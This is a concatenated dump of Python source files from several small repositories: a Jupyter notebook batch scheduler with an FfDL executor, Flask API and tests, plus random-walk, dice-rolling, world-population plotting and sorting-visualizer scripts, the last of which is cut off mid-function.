if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
rootdir = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
self.runtimedir = pkg_resources.resource_filename('enterprise_scheduler', 'resources/ffdl')
print('Resources dir: {} '.format(self.runtimedir))
def execute_task(self, task):
config = Config(api_endpoint=task['endpoint'],
user=task['user'],
password="temporary",
user_info=task['userinfo'])
ffdl_zip = self._create_ffdl_zip(task)
ffdl_manifest = self._create_manifest(task)
ffdl_ui_port = "32263" ## FFDL UI hosting can vary
files = {'model_definition': ffdl_zip,
'manifest': ffdl_manifest }
client = FfDLClient(config)
result = client.post('/models', **files)
if 'model_id' in result:
print("Training URL : http://{}:{}/#/trainings/{}/show"
.format(urlparse(config.api_endpoint).netloc.split(":")[0],
ffdl_ui_port,
result['model_id']))
elif 'message' in result:
# Catches server-side FFDL errors returned with a 200 code
print("FFDL Job Submission Request Failed: {}".format(
result['message']))
elif 'error' in result:
# Catches HTTP errors returned by the FFDL server
print("FFDL Job Submission Request Failed: {}".format(
result['error']))
else:
# Cases with no error but the submission was unsuccessful
print("FFDL Job Submission Failed")
def _create_manifest(self, task):
file_name = 'manifest-' + str(task['id'])[:8]
file_location = self.workdir + '/' + file_name + ".yml"
task_description = 'Train Jupyter Notebook'
if 'notebook_name' in task:
task_description += ': ' + task['notebook_name']
manifest_dict = dict(
name=file_name,
description=task_description,
version="1.0",
gpus=task['gpus'],
cpus=task['cpus'],
memory=task['memory'],
learners=1,
data_stores= [dict(
id='sl-internal-os',
type='mount_cos',
training_data= dict(
container=task['cos_bucket_in']
),
training_results= dict(
container=task['cos_bucket_out']
),
connection= dict(
auth_url=task['cos_endpoint'],
user_name=task['cos_user'],
password=task['cos_password']
)
)],
framework= dict(
name=task['framework'],
version='1.5.0-py3',
command='./start.sh' ## Run the start script for EG and kernel
)
)
with open(file_location, 'w') as outfile:
yaml.dump(manifest_dict, outfile, default_flow_style=False)
return file_location
def _create_ffdl_zip(self, task):
unique_id = 'ffdl-' + str(task['id'])[:8]
task_directory = os.path.join(self.workdir, unique_id)
os.makedirs(task_directory)
self._write_file(task_directory, "notebook.ipynb", json.dumps(task['notebook']))
if 'dependencies' in task:
for dependency in task['dependencies']:
self._write_file(task_directory, dependency, task['dependencies'][dependency])
self._create_env_sh(task, task_directory)
copyfile(os.path.join(self.runtimedir, "start.sh"),
os.path.join(task_directory, "start.sh"))
copyfile(os.path.join(self.runtimedir, "run_notebook.py"),
os.path.join(task_directory, "run_notebook.py"))
zip_file = os.path.join(self.workdir, '{}.zip'.format(unique_id))
# print('>>> {}'.format(zip_file))
# print('>>> {}'.format(task_directory))
zip_directory(zip_file, task_directory)
return zip_file
def _create_env_sh(self, task, task_directory):
lines = ["#!/usr/bin/env bash\n"]
for key, value in task['env'].items():
lines.append("export {}={}".format(shlex.quote(key),
shlex.quote(value)))
contents = "\n".join(lines) + "\n"
self._write_file(task_directory, "env.sh", contents)
@staticmethod
def _write_file(directory, filename, contents):
filename = os.path.join(directory, filename)
with open(filename, 'w') as f:
f.write(str(contents))
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,951
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/setup.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import setup, find_packages
with open('README.rst') as readme_file:
readme = readme_file.read()
requirements = [
'click>=6.0',
'bumpversion>=0.5.3',
'wheel>=0.30.0',
'watchdog>=0.8.3',
'flake8>=3.5.0',
'tox>=2.9.1',
'coverage>=4.5.1',
'Sphinx>=1.7.1',
'twine>=1.10.0',
'nbconvert>=5.3.1',
'requests >= 2.8, < 3.0',
'ffdl-client>=0.1.2',
'flask-restful>=0.3.6',
'jupyter_enterprise_gateway>=1.0.0'
]
setup_requirements = [ ]
test_requirements = [ ]
setup(
author="Luciano Resende",
author_email='lresende@apache.org',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
description="Python Boilerplate contains all the boilerplate you need to create a Python package.",
entry_points={
'console_scripts': [
'enterprise_scheduler=enterprise_scheduler.scheduler_application:main',
],
},
install_requires=requirements,
license='Apache License, Version 2.0',
long_description=readme,
include_package_data=True,
keywords='enterprise_scheduler',
name='enterprise_scheduler',
packages=find_packages(include=['enterprise_scheduler']),
setup_requires=setup_requirements,
test_suite='tests',
tests_require=test_requirements,
url='https://github.com/lresende/enterprise_scheduler',
version='0.1.0.dev2',
zip_safe=False,
)
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,952
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/tests/test_scheduler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `enterprise_scheduler` package."""
import asyncio
import os
import json
import unittest
import time
from pprint import pprint
from enterprise_scheduler.scheduler import Scheduler
from enterprise_scheduler.util import fix_asyncio_event_loop_policy
RESOURCES = os.path.join(os.path.dirname(__file__), 'resources')
DEFAULT_GATEWAY = "lresende-elyra:8888"
DEFAULT_KERNELSPEC = "python2"
class TestEnterpriseScheduler(unittest.TestCase):
"""Tests for `enterprise_scheduler` package."""
scheduler = None
@classmethod
def setUpClass(cls):
"""Set up test fixtures, if any."""
fix_asyncio_event_loop_policy(asyncio)
cls.scheduler = Scheduler()
cls.scheduler.start()
@classmethod
def tearDownClass(cls):
"""Tear down test fixtures, if any."""
cls.scheduler.stop()
cls.scheduler = None
def test_execute_jupyter_task_with_embedded_notebook(self):
notebook = self._read_notebook('simple.ipynb')
task = {}
task['executor'] = 'jupyter'
task['endpoint'] = DEFAULT_GATEWAY
task['kernelspec'] = DEFAULT_KERNELSPEC
task['notebook'] = notebook
TestEnterpriseScheduler.scheduler.schedule_task(task)
def test_execute_jupyter_task_with_remote_notebook(self):
task = {}
task['executor'] = 'jupyter'
task['endpoint'] = DEFAULT_GATEWAY
task['kernelspec'] = DEFAULT_KERNELSPEC
task['notebook_location'] = 'http://home.apache.org/~lresende/notebooks/notebook-brunel.ipynb'
TestEnterpriseScheduler.scheduler.schedule_task(task)
def test_execute_ffdl_task_with_embedded_notebook(self):
notebook = self._read_notebook('ffdl.ipynb')
task = {}
task['executor'] = 'ffdl'
task['framework'] = 'tensorflow'
task['endpoint'] = '##########'
task['kernelspec'] = 'python3'
task['user'] = '##########'
task['userinfo'] = 'bluemix-instance-id=test-user'
task['cpus'] = 1
task['gpus'] = 0
task['memory'] = '1Gb'
task['cos_endpoint'] = '##########'
task['cos_user'] = '##########'
task['cos_password'] = '##########'
task['notebook'] = notebook
TestEnterpriseScheduler.scheduler.schedule_task(task)
def _read_notebook(self, filename):
filename = os.path.join(RESOURCES, filename)
with open(filename, 'r') as f:
return json.load(f)
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,953
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/enterprise_scheduler/scheduler_resource.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2018-2019 Luciano Resende
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from flask import Response, request
from flask_restful import Resource
from enterprise_scheduler.scheduler import Scheduler
scheduler = Scheduler()
scheduler.start()
class SchedulerResource(Resource):
"""
Scheduler REST API used to submit Jupyter Notebooks for batch executions
curl -X POST -v http://localhost:5000/scheduler/tasks -d "{\"notebook_location\":\"http://home.apache.org/~lresende/notebooks/notebook-brunel.ipynb\"}"
"""
def __init__(self, default_gateway_host, default_kernelspec):
self.default_gateway_host = default_gateway_host
self.default_kernelspec = default_kernelspec
def _html_response(self, data):
resp = Response(data, mimetype='text/plain', headers=None)
resp.status_code = 200
return resp
def post(self):
global scheduler
task = request.get_json(force=True)
if 'endpoint' not in task.keys():
task['endpoint'] = self.default_gateway_host
if 'kernelspec' not in task.keys():
task['kernelspec'] = self.default_kernelspec
scheduler.schedule_task(task)
return 'submitted', 201
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,954
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/enterprise_scheduler/scheduler_application.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2018-2019 Luciano Resende
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Enterprise Scheduler - Schedule Notebook execution."""
import os
import sys
import asyncio
import click
from flask import Flask
from flask_restful import Api
from enterprise_scheduler.scheduler_resource import SchedulerResource
from enterprise_scheduler.util import fix_asyncio_event_loop_policy
server_name = os.getenv('SERVER_NAME','127.0.0.1:5000')
@click.command()
@click.option('--gateway_host', default='lresende-elyra:8888', help='Jupyter Enterprise Gateway host information')
@click.option('--kernelspec', default='python2', help='Jupyter Notebook kernelspec to use while executing notebook')
def main(gateway_host, kernelspec):
"""Jupyter Enterprise Scheduler - Schedule Notebook execution."""
click.echo('Starting Scheduler at {} using Gateway at {} with default kernelspec {}'.format(server_name, gateway_host, kernelspec))
click.echo('Add new tasks via post commands to http://{}/scheduler/tasks '.format(server_name))
fix_asyncio_event_loop_policy(asyncio)
app = Flask('Notebook Scheduler')
api = Api(app)
api.add_resource(SchedulerResource, '/scheduler/tasks',
resource_class_kwargs={ 'default_gateway_host': gateway_host, 'default_kernelspec': kernelspec })
print('Add new tasks via http://{}/scheduler/tasks '.format(server_name))
server_parts = server_name.split(':')
app.run(host=server_parts[0], port=int(server_parts[1]), debug=True, use_reloader=False)
return 0
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,955
|
lresende/enterprise_scheduler
|
refs/heads/master
|
/enterprise_scheduler/scheduler.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2018-2019 Luciano Resende
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import queue
import uuid
from threading import Thread
from urllib.request import urlopen
from enterprise_scheduler.executor import JupyterExecutor, FfDLExecutor
class Scheduler:
def __init__(self, default_gateway_host=None, default_kernelspec=None, number_of_threads=5):
self.default_gateway_host = default_gateway_host
self.default_kernelspec = default_kernelspec
self.number_of_threads = number_of_threads
self.executors = {}
self.executors[JupyterExecutor.TYPE] = JupyterExecutor()
self.executors[FfDLExecutor.TYPE] = FfDLExecutor()
self.queue = queue.PriorityQueue()
self.executor_threads = []
self.running = False
def _executor(self):
while self.running:
if not self.queue.empty():
task = self.queue.get()
self._execute_task(task)
self.queue.task_done()
def _execute_task(self, task):
executor_type = task['executor'].lower() # Jupyter, Docker, FfDL
executor = self.executors[executor_type]
executor.execute_task(task)
def schedule_task(self, task):
id = uuid.uuid4()
task['id'] = id
if 'notebook_location' in task.keys():
notebook_location = task['notebook_location']
task['notebook'] = self._read_remote_notebook_content(notebook_location)
self._validate_task(task)
print('adding task [{}] to queue:\n {}'.format(id, str(task)))
self.queue.put(item=task)
return id
def start(self):
self.running = True
for i in range(1, self.number_of_threads):
t = Thread(target=self._executor)
t.daemon = True
self.executor_threads.append(t)
t.start()
def stop(self):
#self.queue.join()
self.running = False
for t in self.executor_threads:
t.join()
@staticmethod
def _validate_task(task):
if 'executor' not in task.keys():
raise ValueError('Submitted task is missing [executor] information')
if 'endpoint' not in task.keys():
raise ValueError('Submitted task is missing [endpoint] information')
if 'kernelspec' not in task.keys():
raise ValueError('Submitted task is missing [kernelspec] information')
if 'notebook_location' not in task.keys() and 'notebook' not in task.keys():
raise ValueError('Submitted task is missing notebook information (either notebook_location or notebook)')
@staticmethod
def _read_remote_notebook_content(notebook_location):
try:
notebook_content = urlopen(notebook_location).read().decode()
return notebook_content
except BaseException as base:
raise Exception('Error reading notebook source "{}": {}'.format(notebook_location, base))
|
{"/enterprise_scheduler/executor.py": ["/enterprise_scheduler/util.py"], "/tests/test_scheduler.py": ["/enterprise_scheduler/scheduler.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler_resource.py": ["/enterprise_scheduler/scheduler.py"], "/enterprise_scheduler/scheduler_application.py": ["/enterprise_scheduler/scheduler_resource.py", "/enterprise_scheduler/util.py"], "/enterprise_scheduler/scheduler.py": ["/enterprise_scheduler/executor.py"]}
|
27,956
|
taotao234/test
|
refs/heads/master
|
/random_wallk.py
|
from random import choice
class RandomWalk():
"""生产随机漫步数据的类"""
def __init__(self,num_points=5000):
"""初始化随机漫步的属性"""
self.num_points = num_points
#所有随机漫步的属性
self.x=[0]
self.y=[0]
def fill_walk(self):
"""计算随机漫步包含的所有点"""
#不断漫步,直到列表达到指定的长度
while len(self.x)<self.num_points:
#决定前进方向及沿着个方向前进的距离
x_direction = choice([1,-1])
x_distance = choice([0,1,2,3,4])
x_step = x_direction * x_distance
y_direction = choice([1,-1])
y_distance = choice([0,1,2,3,4])
y_step = y_direction * y_distance
#拒绝原地踏步
if x_step == 0 and y_step==0:
continue
#计算下一个点的X和Y值
next_x = self.x[-1] +x_step
next_y = self.y[-1]+y_step
self.x.append(next_x)
self.y.append(next_y)
|
{"/die_visual.py": ["/die.py"]}
|
27,957
|
taotao234/test
|
refs/heads/master
|
/world_population.py
|
import json
from country_codes import get_country_code
import pygal
from pygal.style import RotateStyle as RS, LightColorizedStyle as LCS
#将数据加载到一个列表中
filename = 'population_data.json'
with open(filename) as f:
pop_data = json.load(f)
#打印每个国家2010年的人口数量#创建一个包含人口数量的字典
cc_populations = {}
for pop_dict in pop_data:
if pop_dict['Year'] == '2010':
country_name = pop_dict['Country Name']
population = int(float(pop_dict['Value']))
code = get_country_code(country_name)
if code:
cc_populations[code] = population
#根据人口数量将所有国家分成三部分
daguo,zhongguo,xiaoguo ={},{},{}
for cc, pop in cc_populations.items():
if pop<10000000:
xiaoguo[cc] = pop
elif pop <1000000000:
zhongguo[cc] = pop
else:
daguo[cc] = pop
print (len(daguo),len(zhongguo),len(xiaoguo))
wm_style = RS('#336699',base_style =LCS)
wm = pygal.maps.world.World(style=wm_style)
wm.title = '2010世界人口'
wm.add('大国',daguo)
wm.add('中等',zhongguo)
wm.add('小国',xiaoguo)
wm.render_to_file('world_population_sandeng.svg')
|
{"/die_visual.py": ["/die.py"]}
|
27,958
|
taotao234/test
|
refs/heads/master
|
/die_visual.py
|
from die import Die
import pygal
#创建D6
die_1 = Die()
die_2 = Die()
#掷几次骰子,将结果储存至列表
results = []
for roll_num in range(1000):
result = die_1.roll()+die_2.roll()
results.append(result)
#分析结果
frequencies = [ ]
max_result = die_1.mianshu+die_2.mianshu
for value in range(2,max_result+1):
frequency = results.count(value)
frequencies.append(frequency)
#对结果可视化
hist=pygal.Bar()
hist.x_labels =['1','2','3','4','5','6']
hist.title = 'roll D6'
hist.x_title = 'dianshu'
hist.y_titel ='cishu'
hist.add ('d6+d6',frequencies)
hist.render_to_file('die_visuals.vsg')
|
{"/die_visual.py": ["/die.py"]}
|
27,959
|
taotao234/test
|
refs/heads/master
|
/die.py
|
from random import randint
class Die():
#表示一个骰子的类
def __init__(self,mianshu=6):
#骰子默认6个面
self.mianshu = mianshu
def roll(self):
#返回一个位于1和骰子面数之间的随机值
return randint(1,self.mianshu)
|
{"/die_visual.py": ["/die.py"]}
|
27,971
|
erikbenton/neural_network_practice
|
refs/heads/master
|
/neural_network.py
|
import numpy as np
import math
import matplotlib as plt
import mnist_loader
import random
import json
import sys
class CrossEntropyCost:
@staticmethod
def fn(a, y):
return np.sum(np.nan_to_num(-y*np.log(a) - (1 - y)*np.log(1 - a)))
@staticmethod
def delta(z, a, y):
res = np.subtract(a, y)
return res
class QuadraticCost:
@staticmethod
def fn(a, y):
return 0.5 * np.linalg.norm(np.subtract(a, y))**2
@staticmethod
def delta(z, a, y):
return np.matmul(np.subtract(a, y), sigmoid_prime(z))
class Network:
def __init__(self, sizes, cost=CrossEntropyCost):
# Number of neural layers in the network
self.num_layers: int = len(sizes)
# Number of input neurons
self.sizes: int = sizes
self.biases: list = []
self.weights: list = []
self.default_weight_initializer()
self.cost = cost
return
def default_weight_initializer(self):
# Initializes the bias with a Gaussian random distribution with mean 0 and SD == 1
# No biases are set for the input layer
self.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]
# Initializes the weights as a Gaussian distribution
# with a mean of 0 and an SD == 1/sqrt(num_weights_to_same_neuron)
self.weights = [np.random.randn(y, x)/np.sqrt(x) for x, y in (self.sizes[:-1], self.sizes[1:])]
return
def large_weight_initializer(self):
# Initializes the bias with a Gaussian random distribution with mean 0 and SD == 1
# No biases are set for the input layer
self.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]
# Initializes the weights as a Gaussian distribution
# with a mean of 0 and an SD == 1
self.weights = [np.random.randn(y, x) for x, y in (self.sizes[:-1], self.sizes[1:])]
return
def feed_forward(self, a):
# Creating a list of the zipped tuples
zipped_biases_weights = list(zip(self.biases, self.weights))
for b, w in zipped_biases_weights:
a = sigmoid(np.dot(w, a) + b)
return a
def sgd(self, training_data, epochs, mini_batch_size, learning_rate,
lmbda=0.0,
evaluation_data=None,
monitor_evaluation_cost=False,
monitor_evaluation_accuracy=False,
monitor_training_cost=False,
monitor_training_accuracy=False):
if evaluation_data:
n_test = len(evaluation_data)
n = len(training_data)
evaluation_cost, evaluation_accuracy = [], []
training_cost, training_accuracy = [], []
for j in range(epochs):
random.shuffle(training_data)
mini_batches = [training_data[k:k+mini_batch_size] for k in range(0, n, mini_batch_size)]
for mini_batch in mini_batches:
self.update_mini_batch_matrix(mini_batch, learning_rate, lmbda, len(training_data))
print("Epoch {0} training complete".format(j))
if monitor_training_cost:
cost = self.total_cost(training_data, lmbda)
training_cost.append(cost)
print("Cost on training data: {0}".format(cost))
if monitor_training_accuracy:
accuracy = self.accuracy(training_data, convert=True)
training_accuracy.append(accuracy)
print("Accuracy on the training data: {0} / {1}".format(accuracy, n))
if monitor_evaluation_cost:
cost = self.total_cost(evaluation_data, lmbda, convert=True)
evaluation_cost.append(cost)
print("Cost on evaluation data: {}".format(cost))
if monitor_evaluation_accuracy:
accuracy = self.accuracy(evaluation_data)
evaluation_accuracy.append(accuracy)
print("Accuracy on the evaluation data: {0} / {1}".format(accuracy, n_test))
return evaluation_cost, evaluation_accuracy, training_cost, training_accuracy
def update_mini_batch(self, mini_batch, learning_rate, lmbda, n):
# nabla - the upside-down greek Delta
nabla_b = [np.zeros(b.shape) for b in self.biases]
nabla_w = [np.zeros(w.shape) for w in self.weights]
delta_nablas = []
for x, y in mini_batch:
delta_nabla_b, delta_nabla_w = self.backwards_propagation(x, y)
delta_nablas.append((delta_nabla_b, delta_nabla_w))
zipped_nablas_b = list(zip(nabla_b, delta_nabla_b))
zipped_nablas_w = list(zip(nabla_w, delta_nabla_w))
nabla_b = [nb + dnb for nb, dnb in zipped_nablas_b]
nabla_w = [nw + dnw for nw, dnw in zipped_nablas_w]
zipped_biases_nabla_b = list(zip(self.biases, nabla_b))
zipped_weights_nabla_w = list(zip(self.weights, nabla_w))
self.weights = [(1-learning_rate*(lmbda/n))*w - (learning_rate/len(mini_batch))*nw
for w, nw in zipped_weights_nabla_w]
self.biases = [b - (learning_rate/len(mini_batch))*nb
for b, nb in zipped_biases_nabla_b]
return
def backwards_propagation(self, x, y):
nabla_b = [np.zeros(b.shape) for b in self.biases]
nabla_w = [np.zeros(w.shape) for w in self.weights]
# feed forward
activation = x
# Layer by layer list of the activations
activations = [x]
# Layer by layer list to store all the z vectors
zs = []
for b, w in zip(self.biases, self.weights):
z = np.dot(w, activation) + b
zs.append(z)
activation = sigmoid(z)
activations.append(activation)
# Backward pass
delta = self.cost.delta(zs[-1], activations[-1], y)
nabla_b[-1] = delta
nabla_w[-1] = np.dot(delta, activations[-2].transpose())
for i in range(2, self.num_layers):
z = zs[-i]
sp = sigmoid_prime(z)
delta = np.dot(self.weights[-i+1].transpose(), delta) * sp
nabla_b[-i] = delta
nabla_w[-i] = np.dot(delta, activations[-i-1].transpose())
return nabla_b, nabla_w
def update_mini_batch_matrix(self, mini_batch, learning_rate, lmbda, n):
# nabla - the upside-down greek Delta
xs = np.array([x for x, y in mini_batch]).reshape(len(mini_batch), self.sizes[0]).transpose()
ys = np.array([y for x, y in mini_batch]).reshape(len(mini_batch), self.sizes[-1]).transpose()
nabla_b, nabla_w = self.backwards_propagation_matrix(xs, ys)
zipped_biases_nabla_b = list(zip(self.biases, nabla_b))
zipped_weights_nabla_w = list(zip(self.weights, nabla_w))
self.weights = [(1-learning_rate*(lmbda/n))*w - (learning_rate/len(mini_batch))*nw
for w, nw in zipped_weights_nabla_w]
self.biases = [b - (learning_rate/len(mini_batch))*nb
for b, nb in zipped_biases_nabla_b]
return
def backwards_propagation_matrix(self, xs, ys):
nabla_b = [np.zeros(b.shape) for b in self.biases]
nabla_w = [np.zeros(w.shape) for w in self.weights]
# feed forward
activation = xs
# Layer by layer list of the activations
activations = [xs]
# Layer by layer list to store all the z vectors
zs = []
for b, w in zip(self.biases, self.weights):
# Make the bias matrix the appropriate size
biases = np.tile(b, (1, np.shape(xs)[1]))
biases.reshape(np.shape(xs)[1], len(b))
z = np.matmul(w, activation) + biases
zs.append(z)
activation = sigmoid(z)
activations.append(activation)
# Backward pass
delta = self.cost.delta(zs[-1], activations[-1], ys)
nabla_b[-1] = np.matmul(delta, np.ones((self.sizes[-1], 1)))
nabla_w[-1] = np.matmul(delta, activations[-2].transpose())
for i in range(2, self.num_layers):
z = zs[-i]
sp = sigmoid_prime(z)
delta = np.matmul(self.weights[-i + 1].transpose(), delta) * sp
nabla_b[-i] = np.matmul(delta, np.ones((self.sizes[-1], 1)))
nabla_w[-i] = np.matmul(delta, activations[-i - 1].transpose())
return nabla_b, nabla_w
def accuracy(self, data, convert=False):
# Returns the number of inputs in data that the neural network interpreted correctly
# Neural Network's output is assumed to be the index of the whichever neuron in the final layer
# has the highest activation
if convert:
results = [(np.argmax(self.feed_forward(x)), np.argmax(y)) for x, y in data]
else:
results = [(np.argmax(self.feed_forward(x)), y) for x, y in data]
return sum(int(x == y) for x, y in results)
def total_cost(self, data, lmbda, convert=False):
# Returns the total cost for the data set
cost: float = 0.0
for x, y in data:
a = self.feed_forward(x)
if convert:
y = vectorized_result(y)
cost += self.cost.fn(a, y)/len(data)
cost += 0.5*(lmbda/len(data))*sum(np.linalg.norm(w)**2 for w in self.weights)
return cost
def save(self, filename):
# Save neural network to 'filename'
data = {"sizes": self.sizes,
"weights": [list(w) for w in self.weights],
"biases": [list(b) for b in self.biases],
"cost": str(self.cost.__name__)}
f = open(filename, "w")
json.dump(data, f)
f.close()
return
def evaluate(self, test_data):
test_results = [(np.argmax(self.feed_forward(x)), y) for (x, y) in test_data]
return sum(int(x == y) for (x, y) in test_results)
def load(filename):
# Load neural network from file
f = open(filename, "r")
data = json.load(f)
f.close()
cost = getattr(sys.modules[__name__], data["cost"])
net = Network(data["sizes"], cost=cost)
net.weights = [np.array(w) for w in data["weights"]]
net.biases = [np.array(b) for b in data["biases"]]
return net
def vectorized_result(j):
# Gives a 10 dim unit vector with 1 in the jth place and zeros elsewhere
e = np.zeros((10, 1))
e[j] = 1.0
return e
def sigmoid(z):
return 1.0 / (1 + np.exp(-z))
def cost_derivative(output_activations, y):
return np.subtract(output_activations, y)
def sigmoid_prime(z):
return sigmoid(z) * (1 - sigmoid(z))
training_data, validation_data, test_data = mnist_loader.load_data_wrapper()
net = Network([784, 30, 10])
net.sgd(training_data, 30, 10, 0.5,
lmbda=5.0,
evaluation_data=validation_data,
monitor_evaluation_accuracy=True,
monitor_evaluation_cost=True,
monitor_training_accuracy=True,
monitor_training_cost=True)
|
{"/neural_network.py": ["/mnist_loader.py"]}
|
27,972
|
erikbenton/neural_network_practice
|
refs/heads/master
|
/mnist_loader.py
|
import pickle
import gzip
import numpy as np
def load_data():
# Returns the MNIST data as (training_data, validation_data, test_data)
# The training_data is tuple with 2 entries
#
# First entry has the actual training images used, which is a 50,000 entry numpy ndarray
# where each entry is a numpy ndarray of 784 values (28px * 28px = 784px) - Input layer
#
# Second entry is a 50,000 entry numpy ndarray containing the actual digit (0, ..., 9) value for the
# first entry's 50,000 entries
#
# The validation_data and the test_data are similar to the above, but only 10,000 images
#
# This is a nice way to format the data here, but can be difficult to deal with training_data for the
# backwards_propagation so the load_data_wrapper function modifies it slightly
f = gzip.open('mnist.pkl.gz', 'rb')
training_data, validation_data, test_data = pickle.load(f, encoding='latin1')
f.close()
return training_data, validation_data, test_data
def load_data_wrapper():
# Return (training_data, validation_data, test_data)
# Based on the load_data, but a more convenient format
#
# training_data is a list of 50,000 2-tuples (x, y)
# x - 784 dimensional numpy ndarray containing the input image
# y - 10 dimensional numpy ndarray with corresponding classification, or correct digit, for x
#
# Therefore the format for the training_data and the validation_data/test_data
tr_d, va_d, te_d = load_data()
training_inputs = [np.reshape(x, (784, 1)) for x in tr_d[0]]
training_results = [vectorized_result(y) for y in tr_d[1]]
training_data = list(zip(training_inputs, training_results))
validation_inputs = [np.reshape(x, (784, 1)) for x in va_d[0]]
validation_data = list(zip(validation_inputs, va_d[1]))
test_inputs = [np.reshape(x, (784, 1)) for x in te_d[0]]
test_data = list(zip(test_inputs, te_d[1]))
return training_data, validation_data, test_data
def vectorized_result(j):
# Returns a 10 dimensional unit vector with a 1 in the jth position and 0s elsewhere
e = np.zeros((10, 1))
e[j] = 1.0
return e
|
{"/neural_network.py": ["/mnist_loader.py"]}
|
27,973
|
akash121801/Sorting-Visualizations
|
refs/heads/main
|
/InsertionSort.py
|
import time
def insertion_sort(data, drawData, tick):
for i in range(1, len(data)):
j = i
while(j > 0 and data[j] < data[j-1]):
drawData(data, ['red' if x == j or x == j + 1 else 'gray' for x in range(len(data))])
time.sleep(tick)
data[j], data[j-1] = data[j-1], data[j]
j -=1
drawData(data, ['white' if x < i else 'gray' for x in range(len(data))])
time.sleep(tick)
|
{"/sortingAlgos.py": ["/SelectionSort.py", "/InsertionSort.py", "/MergeSort.py", "/QuickSort.py"]}
|
27,974
|
akash121801/Sorting-Visualizations
|
refs/heads/main
|
/MergeSort.py
|
import time
def merge_sort(data, drawData, tick):
return merge_sort_alg(data,0, len(data)-1, drawData, tick)
def merge_sort_alg(data, left, right, drawData, tick):
if left < right:
middle= (left + right) //2
merge_sort_alg(data, left, middle, drawData, tick)
merge_sort_alg(data, middle+1, right, drawData, tick)
merge(data, left, middle, right, drawData, tick)
def merge(data, left, middle, right, drawData, tick):
drawData(data, getColorArr(len(data), left, middle, right))
time.sleep(tick)
leftSide=data[0 : middle+1]
rightSide=data[middle + 1: right + 1]
leftIndex= rightIndex=0
for dataIndex in range(left, right +1):
if (leftIndex < len(leftSide) and rightIndex < len(rightSide)):
if leftSide[leftIndex] <= rightSide[rightIndex]:
data[dataIndex]=leftSide[leftIndex]
leftIndex +=1
else:
data[dataIndex]=rightSide[rightIndex]
